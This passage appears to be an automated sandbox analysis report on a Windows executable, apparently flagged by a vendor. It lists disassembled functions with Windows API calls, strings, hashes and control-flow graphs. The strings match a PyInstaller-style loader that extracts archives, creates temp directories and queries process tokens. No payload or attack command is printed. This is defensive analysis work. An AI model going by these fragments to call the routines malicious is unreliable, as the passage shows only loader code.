                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
                                                                                                                                                                                                                              • Instruction ID: 268be9953173299050babd1cc5b9ac8576ec22708eb0e55688078a03abb146f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D851AE61A0864792FA10FB6194803B9E3A2FF84798FC445B3EE4C4779ADE3CE545C362
                                                                                                                                                                                                                              Function 00007FF7EAD08660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD08704
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0870A
                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0874C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08830: GetEnvironmentVariableW.KERNEL32(00007FF7EAD0388E), ref: 00007FF7EAD08867
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7EAD08889
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD18238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD18251
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                              • Instruction ID: 3f3a38a82d29616b10cb8db9ac92c9c84d55e9d54d752fc36843bf9f2c64cb85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43419C61A1964244FA11F721A8A53FEA392EF98788FC001B3ED0D477DEDE7CE401C262
                                                                                                                                                                                                                              Function 00007FF7EAD01210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 601 7ff7ead01210-7ff7ead0126d call 7ff7ead0bd80 604 7ff7ead0126f-7ff7ead01296 call 7ff7ead02710 601->604 605 7ff7ead01297-7ff7ead012af call 7ff7ead14f44 601->605 610 7ff7ead012d4-7ff7ead012e4 call 7ff7ead14f44 605->610 611 7ff7ead012b1-7ff7ead012cf call 7ff7ead14f08 call 7ff7ead02910 605->611 617 7ff7ead012e6-7ff7ead01304 call 7ff7ead14f08 call 7ff7ead02910 610->617 618 7ff7ead01309-7ff7ead0131b 610->618 622 7ff7ead01439-7ff7ead0144e call 7ff7ead0ba60 call 7ff7ead14f30 * 2 611->622 617->622 621 7ff7ead01320-7ff7ead01345 call 7ff7ead1039c 618->621 630 7ff7ead01431 621->630 631 7ff7ead0134b-7ff7ead01355 call 7ff7ead10110 621->631 638 7ff7ead01453-7ff7ead0146d 622->638 630->622 631->630 637 7ff7ead0135b-7ff7ead01367 631->637 639 7ff7ead01370-7ff7ead01398 call 7ff7ead0a1c0 637->639 642 7ff7ead01416-7ff7ead0142c call 7ff7ead02710 639->642 643 7ff7ead0139a-7ff7ead0139d 639->643 642->630 644 7ff7ead01411 643->644 645 7ff7ead0139f-7ff7ead013a9 643->645 644->642 647 7ff7ead013d4-7ff7ead013d7 645->647 648 7ff7ead013ab-7ff7ead013b9 call 7ff7ead10adc 645->648 650 7ff7ead013ea-7ff7ead013ef 647->650 651 7ff7ead013d9-7ff7ead013e7 call 7ff7ead29e30 647->651 654 7ff7ead013be-7ff7ead013c1 648->654 650->639 653 7ff7ead013f5-7ff7ead013f8 650->653 651->650 656 7ff7ead0140c-7ff7ead0140f 653->656 657 7ff7ead013fa-7ff7ead013fd 653->657 658 7ff7ead013c3-7ff7ead013cd call 7ff7ead10110 654->658 659 7ff7ead013cf-7ff7ead013d2 654->659 656->630 657->642 660 7ff7ead013ff-7ff7ead01407 657->660 658->650 658->659 659->642 660->621
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                              • Instruction ID: 62705e2bbc6e83401a42566eb4fc28e506f6df863e2286ddd92be26972ff1290
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB51D362A0864285F620FB21A4903BAA392FF84798FC44176EE4D477DDEE3CE541C722
                                                                                                                                                                                                                              Function 00007FF7EAD1ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,-00000018,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE8C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,-00000018,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE98
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction ID: b39e7234e96bca1a87d7e83c421984d7c3d88e8cf35b04d14a611052094d365f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1941F265B19A1241FB16EB269800B75A399FF59B90FC8857ADD1D8738CEE3CE4058222
                                                                                                                                                                                                                              Function 00007FF7EAD036B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02C50: MessageBoxW.USER32 ref: 00007FF7EAD02D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction ID: aa58795fd151d1a2addeb85b119a2229fb7102c7a0d362bdb799c6b4eaf65dcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48217F61B1864241FA20F724E8953FAA756FF88358FC042B3E65D825DDEE3CE505C762
                                                                                                                                                                                                                              Function 00007FF7EAD1BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 746 7ff7ead1ba5c-7ff7ead1ba82 747 7ff7ead1ba9d-7ff7ead1baa1 746->747 748 7ff7ead1ba84-7ff7ead1ba98 call 7ff7ead14ee8 call 7ff7ead14f08 746->748 750 7ff7ead1be77-7ff7ead1be83 call 7ff7ead14ee8 call 7ff7ead14f08 747->750 751 7ff7ead1baa7-7ff7ead1baae 747->751 766 7ff7ead1be8e 748->766 768 7ff7ead1be89 call 7ff7ead1a8e0 750->768 751->750 753 7ff7ead1bab4-7ff7ead1bae2 751->753 753->750 756 7ff7ead1bae8-7ff7ead1baef 753->756 760 7ff7ead1bb08-7ff7ead1bb0b 756->760 761 7ff7ead1baf1-7ff7ead1bb03 call 7ff7ead14ee8 call 7ff7ead14f08 756->761 764 7ff7ead1bb11-7ff7ead1bb17 760->764 765 7ff7ead1be73-7ff7ead1be75 760->765 761->768 764->765 770 7ff7ead1bb1d-7ff7ead1bb20 764->770 769 7ff7ead1be91-7ff7ead1bea8 765->769 766->769 768->766 770->761 773 7ff7ead1bb22-7ff7ead1bb47 770->773 775 7ff7ead1bb7a-7ff7ead1bb81 773->775 776 7ff7ead1bb49-7ff7ead1bb4b 773->776 777 7ff7ead1bb83-7ff7ead1bbab call 7ff7ead1d5fc call 7ff7ead1a948 * 2 775->777 778 7ff7ead1bb56-7ff7ead1bb6d call 7ff7ead14ee8 call 7ff7ead14f08 call 7ff7ead1a8e0 775->778 779 7ff7ead1bb4d-7ff7ead1bb54 776->779 780 7ff7ead1bb72-7ff7ead1bb78 776->780 809 7ff7ead1bbc8-7ff7ead1bbf3 call 7ff7ead1c284 777->809 810 7ff7ead1bbad-7ff7ead1bbc3 call 7ff7ead14f08 call 7ff7ead14ee8 777->810 807 7ff7ead1bd00 778->807 779->778 779->780 781 7ff7ead1bbf8-7ff7ead1bc0f 780->781 784 7ff7ead1bc8a-7ff7ead1bc94 call 7ff7ead2391c 781->784 785 7ff7ead1bc11-7ff7ead1bc19 781->785 798 7ff7ead1bc9a-7ff7ead1bcaf 784->798 799 7ff7ead1bd1e 784->799 785->784 788 7ff7ead1bc1b-7ff7ead1bc1d 785->788 788->784 792 7ff7ead1bc1f-7ff7ead1bc35 788->792 792->784 796 7ff7ead1bc37-7ff7ead1bc43 792->796 796->784 803 7ff7ead1bc45-7ff7ead1bc47 796->803 798->799 801 7ff7ead1bcb1-7ff7ead1bcc3 GetConsoleMode 798->801 805 7ff7ead1bd23-7ff7ead1bd43 ReadFile 799->805 801->799 806 7ff7ead1bcc5-7ff7ead1bccd 801->806 803->784 808 7ff7ead1bc49-7ff7ead1bc61 803->808 811 7ff7ead1bd49-7ff7ead1bd51 805->811 812 7ff7ead1be3d-7ff7ead1be46 GetLastError 805->812 806->805 814 7ff7ead1bccf-7ff7ead1bcf1 ReadConsoleW 806->814 817 7ff7ead1bd03-7ff7ead1bd0d call 7ff7ead1a948 807->817 808->784 818 7ff7ead1bc63-7ff7ead1bc6f 808->818 809->781 810->807 811->812 820 7ff7ead1bd57 811->820 815 7ff7ead1be48-7ff7ead1be5e call 7ff7ead14f08 call 7ff7ead14ee8 812->815 816 7ff7ead1be63-7ff7ead1be66 812->816 822 7ff7ead1bd12-7ff7ead1bd1c 814->822 823 7ff7ead1bcf3 GetLastError 814->823 815->807 827 7ff7ead1bcf9-7ff7ead1bcfb call 7ff7ead14e7c 816->827 828 7ff7ead1be6c-7ff7ead1be6e 816->828 817->769 818->784 826 7ff7ead1bc71-7ff7ead1bc73 818->826 830 7ff7ead1bd5e-7ff7ead1bd73 820->830 822->830 823->827 826->784 835 7ff7ead1bc75-7ff7ead1bc85 826->835 827->807 828->817 830->817 831 7ff7ead1bd75-7ff7ead1bd80 830->831 837 7ff7ead1bda7-7ff7ead1bdaf 831->837 838 7ff7ead1bd82-7ff7ead1bd9b call 7ff7ead1b674 831->838 835->784 842 7ff7ead1be2b-7ff7ead1be38 call 7ff7ead1b4b4 837->842 843 7ff7ead1bdb1-7ff7ead1bdc3 837->843 846 7ff7ead1bda0-7ff7ead1bda2 838->846 842->846 847 7ff7ead1be1e-7ff7ead1be26 843->847 848 7ff7ead1bdc5 843->848 846->817 847->817 850 7ff7ead1bdca-7ff7ead1bdd1 848->850 851 7ff7ead1be0d-7ff7ead1be18 850->851 852 7ff7ead1bdd3-7ff7ead1bdd7 850->852 851->847 853 7ff7ead1bdd9-7ff7ead1bde0 852->853 854 7ff7ead1bdf3 852->854 853->854 855 7ff7ead1bde2-7ff7ead1bde6 853->855 856 7ff7ead1bdf9-7ff7ead1be09 854->856 855->854 857 7ff7ead1bde8-7ff7ead1bdf1 855->857 856->850 858 7ff7ead1be0b 856->858 857->856 858->847
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                              • Instruction ID: be7efa2d6ec71f8b965ffb037162accb55d07a8a9701b2b3a91cd888d3e0b722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0C1E472A0C68681F761EB3590407BDBB51FBA1B80FD541B3EA4E07799CE7CE4458722
                                                                                                                                                                                                                              Function 00007FF7EAD08570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                              • Instruction ID: 7a205ca501030bbe37e45ae4147238bd0d51d1dbba501999e9b6e4a0af08ac41
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED216F31A0C64242FB10EB55B58432EE3A5EB817A4FD00276EAAC43BECDEBCD4558721
                                                                                                                                                                                                                              Function 00007FF7EAD090E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetCurrentProcess.KERNEL32 ref: 00007FF7EAD08590
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: OpenProcessToken.ADVAPI32 ref: 00007FF7EAD085A3
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetTokenInformation.KERNELBASE ref: 00007FF7EAD085C8
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetLastError.KERNEL32 ref: 00007FF7EAD085D2
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: GetTokenInformation.KERNELBASE ref: 00007FF7EAD08612
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7EAD0862E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08570: CloseHandle.KERNEL32 ref: 00007FF7EAD08646
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD0916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7EAD03C55), ref: 00007FF7EAD09175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                              • Instruction ID: 5faf2dcf634453205b20e61b94ecc619cba160dcf0766a63f7d000a4e0d2f3cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF214F21A0864281F610FB20E8593EAA3A6FF94784FC44077EA4D4379ADF3CD945C762
                                                                                                                                                                                                                              Function 00007FF7EAD1CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
